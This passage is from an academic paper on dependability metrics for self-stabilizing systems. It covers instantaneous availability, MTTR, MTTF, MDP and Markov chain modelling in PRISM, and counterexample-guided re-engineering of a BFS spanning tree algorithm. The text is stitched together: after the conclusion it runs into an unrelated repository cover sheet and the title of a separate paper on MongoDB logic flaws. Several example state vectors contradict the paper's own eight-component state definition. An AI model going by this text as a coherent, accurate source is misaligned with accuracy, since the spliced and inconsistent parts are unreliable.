We will next describe the method to evaluate dependability metrics of self-stabilizing systems, with an emphasis on silent self-stabilizing systems. 3 Dependability Evaluation of Self-Stabilizing Systems We now present a procedure with tool support for evaluating dependability metrics of self-stabilizing systems. A self-stabilizing BFS spanning tree algorithm given in [8] is used as a working example throughout the following sections to illustrate each phase of our proposed procedure. Note that the method is nevertheless applicable to any other self-stabilizing algorithm as well. 3.1 Dependability Metrics The definition and enumeration of metrics to quantify the dependability of a self-stabilizing system is the linchpin of any approach for dependability evaluation. This becomes particularly critical in the case of self-stabilizing systems, as the assumptions made about the frequency of faults may not hold true in a given implementation scenario. That is, faults may be intermittent, and the temporal separation between them, at times, may not be large enough to allow the system to converge. In this context, reliability, instantaneous availability, and limiting availability have been defined for self-stabilizing systems in [1]. An important part of these definitions is the notion of a system doing “something useful.” A self-stabilizing system is said to do something useful if it satisfies the safety predicate (which in turn specifies the set of legal states) with respect to which it has been shown to be self-stabilizing. We now define the mean time to repair (MTTR) and the mean time to failure (MTTF), along with new metrics called unconditional instantaneous availability and generic instantaneous availability, for self-stabilizing systems. These metrics are measures (in a measure-theoretic sense) provided the system under study can be considered as a stochastic process. 
It is natural to consider discrete-state stochastic processes, where the set of states is divided into a set of operational states (“up states”) and a set of dysfunctional states (“down states”). The basic definition of instantaneous availability at time $t$ quantifies the probability of being in an “up state” at time $t$ [9]. Some variations are possible with respect to the assumption of the system being initially available, an assumption that is not natural in the context of self-stabilizing systems, since these are designed to stabilize from any initial state. Towards that end, we define generic instantaneous availability and unconditional instantaneous availability and apply them in the context of self-stabilizing systems. Our natural focus is on systems evolving in discrete time, thus where the system moves from state to state in steps. Time is thus counted in steps, and $s_i$ refers to the state occupied at time $i$. Generic instantaneous availability at step $k$, $A_G(k)$, is defined as the probability $Pr(s_k \models P_{\text{up}} \mid s_0 \models P_{\text{init}})$, where $P_{\text{up}}$ is a predicate that specifies the states in which the system is operational, doing something useful, and $P_{\text{init}}$ specifies the initial states. Unconditional instantaneous availability at step $k$, $A_U(k)$, is defined as the probability $Pr(s_k \models P_{\text{up}} \mid s_0 \models \text{true})$. Unconditional instantaneous availability is the probability that the system is in an “up state” irrespective of the initial state. Generic instantaneous availability is the probability that the system is in an “up state” provided it was started in some specific set of states. As $k$ approaches $\infty$, and provided the limit exists, unconditional and generic instantaneous availability both converge to the limiting availability. 
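On an explicit discrete-time Markov chain, these quantities reduce to transient state probabilities: push the initial distribution forward $k$ steps and sum the mass on "up" states. A minimal sketch (the chain, the predicate, and the choice of initial distribution are illustrative):

```python
def instantaneous_availability(P, up, init_dist, k):
    # Transient analysis of a discrete-time Markov chain: propagate the
    # initial distribution k steps and sum the probability mass on "up"
    # states. With init_dist concentrated on P_init-states this is
    # A_G(k); letting init_dist range over all states (e.g. uniform,
    # one reading of "any initial state") yields A_U(k).
    n = len(P)
    dist = list(init_dist)
    for _ in range(k):
        nxt = [0.0] * n
        for s, ps in enumerate(dist):
            for t in range(n):
                nxt[t] += ps * P[s][t]
        dist = nxt
    return sum(ps for s, ps in enumerate(dist) if up[s])
```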
The above definitions can readily be used in the context of silent self-stabilizing systems by setting $P_{up} = P_S$, where $P_S$ is the safety predicate of the system. Hence, the unconditional instantaneous availability of a silent self-stabilizing system is the probability that the system satisfies its safety predicate at instant $k$ irrespective of its starting state. The generic instantaneous availability of a silent self-stabilizing system is the probability of satisfying the safety predicate provided it started in an initial state characterized by the predicate $P_{init}$. **Mean time to repair (MTTR)** of a self-stabilizing system is the average time (measured in the number of computation steps) taken by a self-stabilizing system to reach a state which satisfies the safety predicate $P_S$. The average is taken over all executions which start in states not satisfying the safety predicate $P_S$. As mentioned earlier, a system has “recovered” from a burst of transient faults when it reaches a safe state. It is also interesting to note that the MTTR mirrors the average-case behavior under a given implementation scenario, unlike the bounds on convergence time that are furnished as part of the convergence proofs of self-stabilizing algorithms. **Mean time to failure (MTTF)** of a self-stabilizing system is the average time (again measured in the number of computation steps) before a system reaches an unsafe state provided it started in a safe state. This definition may appear trivial for a self-stabilizing system, as the notion of MTTF is void given the closure property of self-stabilizing systems. However, under relaxed fault assumptions, closure is not guaranteed, because transient faults may “throw” the system out of the safe states once it has stabilized. Thus, the MTTF may well be finite. There is an interplay between the MTTF and MTTR of a self-stabilizing system, since its limiting availability equals $\frac{MTTF}{MTTF + MTTR}$ [9]. 
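The MTTR just defined is a mean hitting time of the safe states. On an explicit Markov chain it can be approximated by fixed-point iteration over the hitting-time equations; a sketch for small chains (the state space and transition matrix are illustrative):

```python
def mean_time_to_repair(P, safe, iters=10000, tol=1e-12):
    # Expected number of steps until a safe state is reached, averaged
    # over all unsafe starting states: solve the hitting-time equations
    #   h(s) = 0                       for safe s,
    #   h(s) = 1 + sum_t P[s][t]*h(t)  otherwise,
    # by fixed-point iteration.
    n = len(P)
    h = [0.0] * n
    for _ in range(iters):
        nh = [0.0 if safe[s]
              else 1.0 + sum(P[s][t] * h[t] for t in range(n))
              for s in range(n)]
        done = max(abs(a - b) for a, b in zip(nh, h)) < tol
        h = nh
        if done:
            break
    unsafe = [h[s] for s in range(n) if not safe[s]]
    return sum(unsafe) / len(unsafe)
```

For a two-state chain where the unsafe state reaches the safe state with probability 0.5 per step, the expected repair time is 2 steps, the mean of a geometric distribution.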
That is, a particular value of MTTF is an environment property over which a system designer often has no control, but the value of MTTR, in the absence of ongoing faults, is an intrinsic property of a given implementation of a self-stabilizing system together with the scheduler used (synonymously referred to as a self-stabilizing system). One can modify the self-stabilizing system, leading to a possible decrease in average convergence time. The above expression gives a compositional way to fine-tune the limiting availability by modifying the MTTR value of a self-stabilizing system despite a possible inability to influence the value of MTTF. ### 3.2 Model for Dependability Evaluation The modeling of a self-stabilizing system for performance evaluation is the first step of the toolchain. We assume that the self-stabilizing system consists of a number of concurrent components which run in parallel. These components cooperate to bring the system to a stable condition from any starting state. Furthermore, we assume that at any time a fault may occur which brings the system to an arbitrary state. Guarded command language. We can describe a self-stabilizing system using a guarded command language (GCL), which is essentially the language used by the probabilistic model checker PRISM [10]. The model of a component consists of a finite set of variables describing the state of the component, initial valuations for the variables, and a finite set of guarded commands describing the behavior (state changes) of the component. Each guarded command has the form \[ \text{[label]}\ \text{guard} \rightarrow \text{prob}_1 : \text{update}_1 + \ldots + \text{prob}_n : \text{update}_n \] Intuitively, if the guard (a Boolean expression over the set of variables) is satisfied, then the command can be executed. One branch of the command is selected probabilistically and the variables are updated accordingly. Deterministic behavior may be modeled by specifying only a single branch. 
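The semantics of such guarded commands can be sketched directly: each command whose guard holds in a state contributes one labelled transition with a distribution over successor states. This is an illustrative re-implementation in Python, not PRISM's actual machinery:

```python
def enabled_transitions(state, commands):
    # One step of guarded-command semantics: every command whose guard
    # holds in `state` yields a labelled transition whose successor
    # distribution merges the probabilistic branches.
    trans = []
    for label, guard, branches in commands:
        if guard(state):
            dist = {}
            for prob, update in branches:
                nxt = update(state)
                dist[nxt] = dist.get(nxt, 0.0) + prob
            trans.append((label, dist))
    return trans

# A toy component (hypothetical, for illustration): a counter that may
# step up, or be hit by a fault resetting it to 0 or 1 with equal
# probability.
toy = [
    ("step",  lambda s: s < 2, [(1.0, lambda s: s + 1)]),
    ("fault", lambda s: True,  [(0.5, lambda s: 0), (0.5, lambda s: 1)]),
]
```

In state 0 both commands are enabled, so the choice between them is left non-deterministic, exactly the situation the schedulers below resolve.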
The commands in the model may be labeled. Figure 1 gives a sketch of the self-stabilizing BFS algorithm of [8] with three components, each representing a process. Fault-inducing actions are embedded in every component. There are a number of important properties inherent in the model in Figure 1. First, at every step, it is open whether a fault step or a computational step occurs. If a computational step occurs, it is also unclear which component executes a command. Finally, in the case of a fault step, it is unclear which fault occurs, i.e., what the resulting state of the system will be. The model in Figure 1 is thus non-deterministic, since it does not specify how these choices must be resolved. Schedulers. To resolve the non-determinism in the model, and thus to arrive at a uniquely defined stochastic process, one usually employs schedulers. In essence, a scheduler is an abstract entity resolving the non-determinism among the possible choice options at each time step. A set of schedulers is called a scheduler class. For a given scheduler class, one then aims at deriving worst-case and best-case results for the metric considered, obtained by ranging over all stochastic processes induced by the individual schedulers in the class. This computation is performed by the probabilistic model checking machinery. Schedulers can be characterized in many ways, based on the power they have: a scheduler may make decisions based only on the present state (memoryless scheduler) or instead based on the entire past history of states visited (history-dependent scheduler). A scheduler may be randomized or simply deterministic. A randomized scheduler may use probabilities to decide between choice options, while deterministic ones may not. For instance, we can consider the class of randomized schedulers that, when a fault step occurs, choose the particular fault randomly with a uniform distribution. 
When adding this assumption to the GCL specification of the fault model, the resulting system model becomes partially probabilistic, as shown in Figure 2 for the root module. It is still non-deterministic with respect to the question whether a fault step occurs, or which component performs a step. Here, we encoded the probabilistic effect of the schedulers considered inside the GCL specification, while the remaining non-determinism is left to the background machinery. It would also be possible to specify a choice according to a probability distribution that is obtained using information collected from the history of states visited (history-dependent scheduler), or according to a distribution gathered from statistics about faults occurring in real systems.

module root
  variable x02,x01 : int ...;
  [stepRoot]   true -> 1:   x01' = 0 & x02'=0 ...
  [faultRoot]  true -> 1/n: x01' = 0 & x02'=1 + ...
  [faultRootn] true -> 1/n: x01'=2 & x02'=2;
endmodule
module proc1
  variable x10,x12,dis1 : int ...;
  [stepProc1]   true -> 1: (dis1'= min( min(dis1,x01,x21)+1,N)) & (x10' = ...) & (x12'=...);
  [faultProc1]  true -> 1: dis1'=0 & (x10'=0)&(x12'=1) ...
  [faultProc1n] true -> 1: (dis1'=2) & (x10'=2)&(x12'=2);
endmodule
module proc2 ... endmodule

Fig. 1. Non-deterministic self-stabilizing BFS algorithm with faults.

Markov decision processes. The formal semantics of a GCL model is a Markov decision process (MDP). An MDP is a tuple $D = \{S, A, P\}$ where $S$ is the set of states, $A$ is the set of possible actions, and $P \subseteq S \times A \times \text{Dist}(S)$ is the transition relation that gives, for a state and an action, the resulting probability distribution that determines the next state. In the literature, MDPs are often considered equipped with a reward structure, which is not needed in the scope of this paper. Intuitively, we can derive an MDP from a GCL model in the following way. The set of states of the MDP is the set of all possible valuations of the variables in the GCL model. 
The set of actions is the set of labels encountered in the GCL model. For each state, we find the set of commands for which the guard is satisfied. Each such command then gives us an entry in the transition relation, where the action is given by the label associated with the command and the resulting distribution for the next state is determined by the distribution over the updates in the GCL description. In Figure 3 (left), we see an example of an MDP state with its outgoing transitions for our example model from Figure 1 (where the choice of fault is determined probabilistically as in Figure 2). We see that in every state either a fault may occur, after which the resulting state is chosen probabilistically, or a computational step may occur. The choice between faults or different computational steps is still non-deterministic. Markov chain. When we consider a specific scheduler that resolves all non-deterministic choices either deterministically or probabilistically, we find a model whose semantics is a particular kind of MDP, namely one that has for each state $s$ exactly one transition $(s,a,\mu)$ in the transition relation $P$. If we further disregard the actions of the transitions, we arrive at a model which can be interpreted as a Markov chain. We define a Markov chain as a tuple $D = \{S, P\}$ where $S$ is the set of states and $P : S \rightarrow \text{Dist}(S)$ is the transition function that gives for a state the probability distribution that determines the next state. A Markov chain is a stochastic process which is amenable to analysis.

module root
  variable x02,x01 : int ...;
  [stepRoot]   true -> 1:   x01' = 0 & x02'=0 ...
  [faultRoot]  true -> 1/n: x01' = 0 & x02'=1 + ...
  [faultRootn] true -> 1/n: x01'=2 & x02'=2;
endmodule

Fig. 2. Root module with a randomized scheduler for $n$ distinct faults. 
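The effect of a memoryless fully randomized scheduler that picks uniformly among a state's enabled options can be sketched as collapsing the state's action distributions into a single successor distribution, which is exactly what turns the MDP into a Markov chain:

```python
def uniform_scheduler_step(dists):
    # Collapse the non-deterministic choice among the action
    # distributions of one MDP state into a single distribution,
    # assuming a memoryless scheduler that picks each enabled option
    # with equal probability (an illustrative scheduler choice).
    merged = {}
    w = 1.0 / len(dists)
    for dist in dists:
        for s, p in dist.items():
            merged[s] = merged.get(s, 0.0) + w * p
    return merged
```

Applying this to every state of the MDP yields the transition function $P : S \rightarrow \text{Dist}(S)$ of the induced Markov chain.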
For our example, we can find a Markov chain model if we assume a scheduler that chooses probabilistically whether a fault occurs, which component takes a step in case of normal computation, and which fault occurs in case of a fault step. Figure 4 shows the probabilistic model for the root module, and Figure 3 (right) shows part of the resulting model, where $P_A$, $P_B$ and $P_{\text{fault}}$ denote the probabilities that, respectively, component $A$ takes a step, component $B$ takes a step, or a fault occurs. Choosing a scheduler class. Scheduler classes form a hierarchy, induced by set inclusion. For MDPs, the most general class is the class of history-dependent randomized schedulers. Deterministic schedulers can be considered as specific randomized schedulers that schedule with probability 1 only, and memoryless schedulers can be considered as history-dependent schedulers that ignore the history apart from the present state. In the example discussed above (Figure 2 and Figure 4), we have sketched how a scheduler class can be shrunk by adding assumptions about a particular probabilistic behavior. We distinguish two different strategies of doing so: restricted resolution refers to scheduler classes where some non-deterministic options are pruned away; in partially probabilistic resolution, some of the choices are left non-deterministic, while others are randomized (as in Figure 3, left). A fully randomized scheduler class contains a single scheduler only and resolves all non-determinism probabilistically. Choosing a class of schedulers to perform analysis on is not trivial. If we choose too large a class, probability estimations can become so broad as to be unusable (e.g. 
the model checker may conclude that a particular probability measure lies somewhere between 0 and 1). Choosing a smaller class of schedulers results in tighter bounds for our probability measures. However, choosing a small scheduler class requires very precise information about the occurrence of faults and the scheduling of processes. Furthermore, such an analysis would only inform us about one very particular case. A more general result is usually desired, one that takes into account different fault models or scheduling schemes. More advanced scheduler classes are also possible. For the scheduling of $n$ processes, we may allow only those schedules where each process performs a computational step at least every $k$ steps. This is akin to assuming that the fastest process is at most twice as fast as the slowest one. While such assumptions are interesting to investigate, they also make analysis more difficult. To implement such a $k$-bounded scheduler, it is necessary to track the last computational step of every process; the size of the state space then does not scale well for large $n$ and $k$. Model checking. A model checker, such as PRISM [10], may be employed to answer reachability questions for a given MDP model. The general form of such a property is $P_{<p}\,[A\ \mathcal{U}^{\leq k}\ B]$, which checks whether the probability that a state satisfying $B$ is reached within $k$ steps, via a path consisting only of states in which $A$ holds, is smaller than $p$. In this way instantaneous availability properties can be checked. If the property does not hold, a counterexample is generated. We next explain the methods to re-engineer a self-stabilizing system based on a counterexample provided by a probabilistic model checker. 4 Dependability Engineering for Self-Stabilizing Systems In order to meet the quality of service requirements, the counterexample returned by the model checker can be used to optimize the system.
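Before turning to re-engineering, the step-bounded reachability probability underlying properties of the form $P_{<p}\,[A\ \mathcal{U}^{\leq k}\ B]$ (with $A = \text{true}$) can be sketched by backward iteration over a Markov chain; the chain and numbers below are invented:

```python
# Sketch of step-bounded reachability on a Markov chain: prob[s] after i
# iterations is the probability of reaching `target` from s within i steps.
# The three-state chain below is invented; "s2" plays the role of a legal state.
def bounded_reach(P, target, k):
    prob = {s: (1.0 if s in target else 0.0) for s in P}
    for _ in range(k):
        prob = {s: (1.0 if s in target else
                    sum(p * prob[t] for t, p in dist.items()))
                for s, dist in P.items()}
    return prob

mc = {"s0": {"s0": 0.2, "s1": 0.8},
      "s1": {"s0": 0.5, "s2": 0.5},
      "s2": {"s2": 1.0}}
print(bounded_reach(mc, {"s2"}, 2)["s0"])  # 0.4
```

The only path from "s0" into "s2" within two steps goes via "s1", so the result is 0.8 * 0.5; this is the same fixed-point iteration a probabilistic model checker performs internally for bounded-until queries.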
An important distinction between counterexample generation for qualitative model checking and for quantitative model checking is the fact that quantitative model checking returns a set of paths as a counterexample. This distinction needs to be taken into account while devising a method for exploiting the counterexample. We explain a heuristics-based method to modify a system given such a set of paths. The self-stabilizing BFS spanning tree algorithm implemented on a three-process graph under a fully randomized scheduler is used as an illustrative example. We used the stochastic bounded model checker sbmc [11] along with PRISM to generate counterexamples. Please note that this particular method applies only to scenarios where faults follow a uniform probability distribution over the system states. 4.1 Counterexample Structure An understanding of the structure of the elements of the set of paths returned as a counterexample is important to devise a method to modify the system. In the scope of this section, we are interested in achieving a specific unconditional instantaneous availability \( A_U(k) \), which is essentially the step-bounded reachability probability of a legal state. However, the tool used to generate the counterexample can only generate counterexamples for queries that contain an upper bound on the probability of reaching a certain set of states. Therefore, a reformulated query is presented to the model checker. Instead of asking queries of the form “Is the probability of reaching a legal state within \( k \) steps greater than \( p \)?,” i.e. \( P_{>p}\,[\text{true}\ \mathcal{U}^{\leq k}\ \text{legal}] \), the following query is given to the model checker: \( P_{\leq (1-p)}\,[\neg\text{legal}\ \mathcal{W}^{\leq k}\ \text{false}] \). The reformulated query ascertains whether the probability of remaining in non-legal states for \( k \) steps is less than \( 1 - p \).
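The query reformulation described above can be sketched mechanically; the strings below are illustrative pseudo-PCTL, not any tool's exact surface syntax:

```python
# Sketch of the query reformulation: instead of a lower bound on reaching
# `legal` within k steps, an upper bound on staying non-legal for k steps.
# The strings are illustrative pseudo-PCTL, not any tool's exact syntax.
def reformulate(p, k):
    original = f"P>{p} [ true U<={k} legal ]"
    reformulated = f"P<={1 - p} [ !legal W<={k} false ]"
    return original, reformulated

orig, reform = reformulate(0.65, 3)
print(orig)    # P>0.65 [ true U<=3 legal ]
print(reform)  # P<=0.35 [ !legal W<=3 false ]
```

The two queries are duals: a run either reaches a legal state within $k$ steps or stays non-legal for all $k$ steps, so the probability bounds $p$ and $1-p$ refer to complementary events.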
The probability \( p \) used in the queries is equal to the desired value of \( A_U(k) \), namely the unconditional instantaneous availability at step \( k \). In case the probability of reaching non-legal states is larger than the desired threshold value, the probabilistic model checker returns a set of paths of length \( k \). This set consists of \( k \)-length paths such that all the states in the path are non-legal states. The probability of these paths is larger than the threshold specified in the query. This set of paths constitutes a counterexample because the paths as a whole violate the property being model-checked. In order to devise a system optimization method we “dissect” a generic path of length 2, annotated with transition probabilities, for a system with a uniform fault probability distribution:

\( s_i \xrightarrow{p_{c1}} s_j \xrightarrow{p_{c2}} s_k \)

with, in addition, fault transitions of probability \( p_f \) between every pair of states. \( p_{c1} \) and \( p_{c2} \) are probabilities of state transitions due to a computation step, whereas \( p_f \) is the probability of a fault step. Note that due to the uniform fault probability distribution there is a pair of fault transitions between each pair of system states. If the above path is seen in contrast with a fault-free computation of length 2, one can identify the reason for the loss of probability mass. Consider a path that reaches state \( s_k \) from state \( s_i \) in two steps:

\( s_i \rightarrow s_j \rightarrow s_k \)

Such a path can be extracted from an MDP-based model by choosing a specific scheduler. It results in a fully deterministic model because of the absence of fault steps, thereby leaving the model devoid of any stochastic behavior.
The probability associated with each of the two transitions is 1 and therefore the probability of the path is 1 as well [12]. However, the addition of fault steps to the model reduces the probabilities associated with computation steps and thus reduces the probability of the path. In the light of this discussion, we next outline a method to modify the system in order to achieve a desired value of \( A_U(k) \). 4.2 Counterexample-guided System Re-engineering We consider the set of paths of length $k$ returned by the probabilistic model checker. In Step 1, we remove the extraneous paths from the counterexample. In Step 2, we add and remove certain transitions to increase $A_U(k)$. **Step 1.** As explained above, a counterexample consists of all those paths of length $k$ whose probability in total is greater than the threshold value. This set also contains those $k$-length paths where some of the transitions are fault steps. The number of possible paths grows combinatorially as $k$ increases because the uniform fault model adds transitions between every pair of states. For example, as there are (fault) transitions between each pair of states, the probabilistic model checker can potentially return all the transitions of the Markov chain already for $k = 1$. Hence, the problem becomes intractable even for small values of $k$. Therefore, such paths are removed from the set of paths. The resultant set consists of only those $k$-length paths where all the transitions are due to computation steps. The self-stabilizing BFS spanning tree algorithm was model-checked to verify whether the probability of reaching the legal state within three steps is higher than 0.65. The example system did not satisfy the property and thus the conjunction of PRISM and sbmc returned a set of paths as a counterexample. This set contains 190928 paths in total, a large number of which contain fault steps. An instance of such a path is shown below.
$\langle 2, 1, 2, 2, 1, 1, 2 \rangle \rightarrow \langle 2, 2, 2, 2, 1, 0, 0 \rangle \rightarrow \langle 2, 2, 2, 0, 0, 0, 0, 0 \rangle \rightarrow \langle 2, 2, 0, 0, 0, 0, 0, 1 \rangle$ A state in the path is represented as a vector $s_i = \langle x_{01}, x_{02}, x_{11}, x_{12}, dis_1, dis_2, x_{20}, x_{21} \rangle$ where $x_{ij}$ is the communication register owned by process proc$_i$ and dis$_i$ is the local variable of proc$_i$. The removal of such extraneous paths leads to a set of 27 paths. **Step 2.** The probability of a path without a loop is the product of the individual transition probabilities. Due to the presence of fault steps and the associated transition probabilities, one cannot increase the probability measure of a path without decreasing the path length. Consider a path $$s_i \xrightarrow{p_i} s_j \xrightarrow{p_j} s_k \xrightarrow{p_k} s_l$$ and the modified path obtained by 1) adding a direct transition between states $s_i$ and $s_l$ and 2) disabling the transition between states $s_i$ and $s_j$: $$s_i \xrightarrow{p'_i} s_l$$ The addition of a direct transition to state $s_l$, and thereby the reduction of the path length, leads to an increase in the probability of reaching state $s_l$ from state $s_i$. The method thus strives to increase the value of $A_U(k)$ by reducing the length of the paths. As we have no control over the occurrence of fault steps, such transitions can neither be removed nor can the probabilities associated with them be altered. Thus, in essence, we increase the number of paths with length less than $k$ and decrease the number of $k$-length paths to the legal state. The paths in the counterexample are arranged in decreasing order of probability. The following procedure is applied to all the paths, starting with the most probable path. We begin with the first state \( s_0 \) of a path.
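The Step 2 intuition, that shortening a path raises its probability because each extra transition contributes a factor smaller than 1, can be sketched with invented numbers:

```python
# Sketch of the Step 2 effect with invented numbers: the probability of a
# loop-free path is the product of its transition probabilities, so replacing
# a three-step path by a direct transition leaves fewer factors below 1.
def path_prob(transition_probs):
    prod = 1.0
    for p in transition_probs:
        prod *= p
    return prod

original = [0.3, 0.3, 0.3]  # s_i -> s_j -> s_k -> s_l; each computation step
                            # shares probability mass with fault transitions
shortened = [0.3]           # direct transition s_i -> s_l
print(path_prob(original) < path_prob(shortened))  # True
```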
In order to ensure that a transition is feasible between \( s_i \) and \( s_j \), we determine the variables whose valuations need to be changed to reach state \( s_j \) from state \( s_i \). A transition is deemed feasible for addition to a system if the variable valuations can be changed in a single computation step under a specific sequential randomized scheduler. If a transition from state \( s_0 \) to the legal state \( s_l \) is deemed feasible, then a guarded command effecting that state transition is added to the system. In case such a direct transition is not feasible, transitions are added that modify the local states of the processes so as to decrease the convergence time. This method can be iterated over the initial states of the returned paths until the desired threshold is achieved or all the returned paths are used up. Addition of such transitions, however, requires some knowledge of the algorithm under consideration. For instance, a state transition to \( s_l \) that leads to a maximal decrease in convergence time might require changing variables belonging to more than one process. Such a transition is not feasible if the algorithm is implemented with a sequential scheduler. Infeasibility of a direct state transition to \( s_l \) may also result from the lack of “global knowledge.” Let \( s_i \rightarrow s_l \) be the transition that leads to a maximal decrease in convergence time and let \( \text{proc}_x \) be the process whose local state must be changed to effect the aforementioned state transition. Process \( \text{proc}_x \), therefore, needs a guarded command that changes its local state if the system is in a specific global state. However, process \( \text{proc}_x \) cannot determine the local states of all processes in the system unless the communication topology of the system is a completely connected graph. Transition \( s_i \rightarrow s_l \), in this case, is infeasible for communication topologies which are not completely connected.
This is, however, an extremal case because usually processes require knowledge of their extended “neighborhood” rather than global knowledge. We applied the above procedure to the example system by analyzing the resultant set of paths after removing paths with fault steps. The state \( s_b = \langle 2, 2, 1, 2, 2, 1, 1, 2 \rangle \) was the most probable illegal state. The paths having this state as the initial state were inspected more closely; a direct transition to the legal state \( \langle 0, 0, 1, 1, 1, 1, 1, 1 \rangle \) was not feasible because it required changes in variable valuations in all three processes in a single step. However, a transition could be added such that, if the system is in state \( s_b \), the activated non-root process corrects its local state. The communication topology of the example system allows each process to access the local states of all the processes. Thus, guarded commands of the form \[ \text{[stepstateB] state=stateB -> state'= correctstate} \] were added to the processes \( \text{proc}_1 \) and \( \text{proc}_2 \). The modification of the system led to an increase in the probability of reaching the legal state from state \( s_b \) from 0.072 to 0.216. The method described above can be used to modify the system for a given scheduler under a fault model with ongoing faults. However, the very fact that the scheduler is fixed limits the alternatives for modifying the system. For instance, many transitions which could have potentially increased \( A_U(k) \) were rendered infeasible for the example system. This, in turn, can lead to an insufficient increase in $A_U(k)$ or a rather large number of iterations to achieve the threshold value of $A_U(k)$. The problem can be circumvented if one has leeway to fine-tune the randomized scheduler or modify the communication topology.
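The effect of fine-tuning a randomized scheduler can be previewed on a toy chain (all states, numbers and the convergence structure are invented): one root write followed by two non-root writes must succeed within $k$ steps, and activating the "wrong" process is a void step.

```python
# Toy preview of scheduler fine-tuning (everything here is invented): the
# system needs one root write and then two non-root writes to converge, and
# activating the "wrong" process is a void step. availability(p_root) is the
# probability of reaching the legal state L within k steps.
def availability(p_root, k=3):
    P = {"A": {"B": p_root, "A": 1 - p_root},   # root still wrong
         "B": {"C": 1 - p_root, "B": p_root},   # first non-root write pending
         "C": {"L": 1 - p_root, "C": p_root},   # second non-root write pending
         "L": {"L": 1.0}}                       # legal state
    prob = {s: float(s == "L") for s in P}
    for _ in range(k):
        prob = {s: (1.0 if s == "L" else
                    sum(p * prob[t] for t, p in dist.items()))
                for s, dist in P.items()}
    return prob["A"]

for p_root in (0.25, 0.5, 0.75):
    print(p_root, availability(p_root))
```

In this toy model, a lower root-activation probability yields a higher step-bounded availability, mirroring the observation that surplus root activations only consume time.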
4.3 Randomized Scheduler Optimization The probabilities with which individual processes are activated in each step by a scheduler affect the convergence time and thus the unconditional instantaneous availability of the system. A counterexample can be exploited to identify the processes whose activation probabilities need to be modified. For instance, consider a path returned by the conjunction of PRISM and sbmc: $\langle 2, 2, 1, 2, 1, 1, 2 \rangle \rightarrow \langle 0, 0, 1, 2, 1, 1, 1, 2 \rangle \rightarrow \langle 0, 0, 1, 1, 1, 1, 1, 2 \rangle \rightarrow \langle 0, 0, 1, 1, 1, 1, 1, 2 \rangle$ In the second-to-last state of the path, activation of the root process does not bring about any state change and thus only increases the convergence time. Hence, if the probability of activating a non-root process is increased in the scope of the example algorithm, the probability associated with such sub-optimal paths can be decreased. We varied the probability of activating the root process in the example system to see the effect on $A_U(k)$. As Figure 6 shows, the unconditional instantaneous availability increases as the probability of activating the root is decreased. This is because a single write operation of the root process corrects its local state; any further activation of the root only consumes time. Once the root process has performed a computation step, any activation of a non-root process corrects that process's local state. The paths in the counterexample can be analyzed in order to identify those processes whose activations lead to void transitions. The respective process activation probabilities of the scheduler can then be fine-tuned to increase $A_U(k)$. 4.4 Abstraction Schemes for Silent Self-Stabilization Probabilistic model checking of self-stabilizing systems suffers from the state space explosion problem even for a small number of processes.
This is due to the fact that the set of initial states of a self-stabilizing system is equal to the entire state space. As we intend to quantify the dependability of a self-stabilizing algorithm in an implementation scenario, we may be confronted with systems having a large number of processes. This necessitates a method to reduce the size of the model before giving it to the model checker. Often, data abstraction is used to reduce the size of large systems while preserving the property under investigation [13]. We next evaluate existing abstraction schemes and identify a suitable abstraction scheme for silent self-stabilizing systems. Data abstraction constructs an abstract system by defining a finite set of abstract variables and a set of expressions which map the variables of the concrete system to the domain of the abstract variables. A form of data abstraction is predicate abstraction, where a set of Boolean predicates is used to partition the concrete system state space [14]. Doing so results in an abstract system whose states are tuples of Boolean variables. However, predicate abstraction can only be used to verify safety properties as it does not preserve liveness properties [15]. Since convergence is a liveness property, predicate abstraction cannot be used to derive smaller models of self-stabilizing systems. Ranking abstraction overcomes this deficiency of predicate abstraction by adding a non-constraining progress monitor to a system [15]. A progress monitor keeps track of the execution of the system with the help of a ranking function. The resulting augmented system can then be abstracted using predicate abstraction. An important step in abstracting a system using ranking abstraction is the identification of a so-called ranking function core. This need not be a complete ranking function; parts of it suffice to begin the verification of a liveness property.
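Predicate abstraction as described above can be sketched in a few lines (the predicates and states are invented):

```python
# Sketch of predicate abstraction (predicates and states are invented): each
# concrete state is mapped to a tuple of Boolean predicate values, so the
# abstract state space has at most 2**len(predicates) states.
predicates = [
    lambda s: s["x"] == 0,      # "x is reset"
    lambda s: s["x"] < s["y"],  # "x is below y"
]

def abstract(state):
    return tuple(pred(state) for pred in predicates)

print(abstract({"x": 0, "y": 3}))  # (True, True)
print(abstract({"x": 5, "y": 3}))  # (False, False)
```

All concrete states mapping to the same Boolean tuple are merged in the abstract system, which is why the abstraction preserves safety properties but loses the progress information needed for liveness.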
The fact that we are trying to evaluate a silent self-stabilizing system makes the search for a ranking function core easier. The proof of the convergence property of a self-stabilizing system is drawn up using either a ranking function [17], for instance a Lyapunov function [18], or some other form of well-foundedness argument [19]. Thus, one already has an explicit ranking function (core) and, if that is not the case, the ranking function core can be “culled” from the proof of the silent self-stabilizing system. Further, we can derive an abstracted self-stabilizing system with the help of usual predicate abstraction techniques once the system has been augmented with a ranking function. 5 Conclusion and Future Work We defined a set of metrics, namely unconditional instantaneous availability, generic instantaneous availability, MTTF, and MTTR, to quantify the dependability of self-stabilizing algorithms. These metrics can also be used to compare different self-stabilizing solutions to a problem. We also showed how to model a self-stabilizing system as an MDP or as a Markov chain to derive these metrics. Further, heuristics-based methods were presented to exploit counterexamples of probabilistic model checking and to re-engineer silent self-stabilizing systems. There are still open challenges with respect to dependability engineering of self-stabilizing systems. An abstraction scheme suitable for non-silent self-stabilizing algorithms is required to make their dependability analysis scalable.

Footnote 4: However, for the properties considered here, which are step-bounded properties, this reasoning does not apply. In fact, we experimented with the predicate-abstraction-based probabilistic model checker PASS [16], which also supports automatic refinement. This was not successful because PASS seemingly was unable to handle the many distinct guards appearing in the initial state abstraction.
As discussed, there are multiple ways to refine a system, which in turn leads to the challenge of finding the most viable alternative. We would also like to increase the tool support for dependability engineering of self-stabilizing systems. We believe that the identification of optimal schedulers and the determination of feasible transitions are the most promising candidates for automation. References
The final publication is available at Springer via http://doi.org/10.1007/s11633-016-1051-x

ResearchSPAce http://researchspace.bathspa.ac.uk/

This pre-published version is made available in accordance with publisher policies. Please cite only the published version using the reference above. Your access and use of this document is based on your acceptance of the ResearchSPAce Metadata and Data Policies, as well as applicable law: https://researchspace.bathspa.ac.uk/policies.html Unless you accept the terms of these Policies in full, you do not have permission to download this document. This cover sheet may not be removed from the document.

Toward Discovering Logic Flaws within MongoDB-Based Web Applications

Shuo Wen1, Yuan Xue2, Jing Xu1, Li-Ying Yuan1, Wen-Li Song1, Hong-Ji Yang3, Guan-Nan Si4

